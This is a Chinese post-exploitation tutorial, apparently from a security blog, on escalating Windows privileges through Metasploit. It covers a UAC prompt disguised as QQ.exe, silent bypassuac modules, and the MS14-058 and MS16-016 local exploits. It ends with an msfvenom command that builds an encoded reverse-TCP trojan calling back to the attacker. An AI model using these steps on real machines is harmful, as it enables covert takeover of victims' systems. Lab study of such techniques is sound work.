前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >后渗透学习二(UAC提权)

后渗透学习二(UAC提权)

作者头像
字节脉搏实验室
发布2020-03-08 17:12:32
1.2K0
发布2020-03-08 17:12:32
举报

文章来自【字节脉搏社区】 作者-purplet

UAC提权

当获得一个低权限的sessions时,这里是管理员权限,想进一步提升权限,可以使用UAC的方法,是因为此时无法通过getsystem直接提权

首先background让当前session后台运行 进入下面这个模块 use Exploit/windows/local/ask set session (此时session对应id) set filename QQ.exe(靶机上将要弹出的uac) exploit 此时在靶机上出现一个exe文件可执行请求提醒,当点击是后,kali上会获得一个session

进入这个session

首先输入sessions查看所有获取到的session,然后进入对应会话session,命令是sessions -i (对应id)

执行getuid发现仍是管理员权限,但是不要担心,再次执行getsystem将获得system权限

但是这样的方式并不好,用户很明显可以看到这样的请求,稍微有些意识的用户都会拒绝点击,因此我们可以尝试bypass uac的方式,不与用户直接交互,而metasploit中就正好提供了这样的模块

MSF模块 exploit/windows/local/bypassuac exploit/windows/local/bypassuac_injection exploit/windows/local/bypassuac_vbs 我们这里就用bypassuac模块

只需设置session即可

set session (session为对应低权限的id)

我们也可以看到这个模块可以对32位和64位的电脑都有效

exploit后我们可以收到一个session,再次执行进入,重复上述提权步骤,将得到system权限(这里不放图了),而靶机那边没有任何反应

至此UACbypass提权成功

附加两个本地提权漏洞

利用本地提权漏洞 search ms14_058 use exploit/windows/local/ms14_058_track_popup_menu 设置session即可 exploit后得到session,这里都不用再执行getsystem的命令,直接得到system权限 可在winxp sp3,win2003 sp2,win7 sp1,win8 32位上执行 search ms16_016 use exploit/windows/local/ms16_016_webdav 设置session即可 exploit后得到session,这里都不用再执行getsystem的命令,直接得到system权限 可在win7 sp1上执行

补充上次遇到的问题:可能是生成的木马有问题

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=攻击机ip LPORT=4444 -f exe > ma.exe

用以上命令生成的木马,不会出现上次报错终止的问题

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-01-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 字节脉搏实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档